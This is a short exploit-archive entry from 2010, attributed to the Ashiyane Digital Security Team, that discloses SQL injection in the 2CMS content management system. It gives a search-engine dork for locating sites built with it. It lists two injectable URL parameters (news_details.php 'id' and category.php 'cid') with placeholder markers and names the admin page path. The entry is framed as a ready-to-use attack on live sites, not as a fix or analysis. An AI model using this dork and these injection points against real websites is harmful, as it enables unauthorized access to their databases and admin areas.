id: 12529
date: 06/03/2010
title: 2CMS SQL Injection Vulnerability
author: Ashiyane
cves: 

================================
2CMS SQL Injection Vulnerability
================================


# Exploit Title: 2CMS SQL Injection Vulnerability  
# Software Site: http://www.2creative.com.au/
# CVE : N/A
# Author: Ashiyane Digital Security Team         
# Platform / Tested on: Linux

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    |      .|'''.|  '||'  '||' '||' '||' '|'     |     '|.   '|' '||''''|  
   |||     ||..  '   ||    ||   ||    || |      |||     |'|   |   ||  .    
  |  ||     ''|||.   ||''''||   ||     ||      |  ||    | '|. |   ||''|    
 .''''|.  .     '||  ||    ||   ||     ||     .''''|.   |   |||   ||       
,|.  .||. |'....|'   ||.  .||. .||.   .||.   ,|.  .||. .|.   '|  .||.....| 

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Dork : " intext:"Web Design Gold Coast by 2Creative" "

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Exploit :

http://[site]/path/news_details.php?id=[sqli]
http://[site]/path/category.php?cid=[sqli]
...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Admin Page : 

http://[site]/path/admin/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Site: Ashiyane.org
Email : mehranphp[at]yahoo[dot]com



#  0day.today [2023-03-25]  #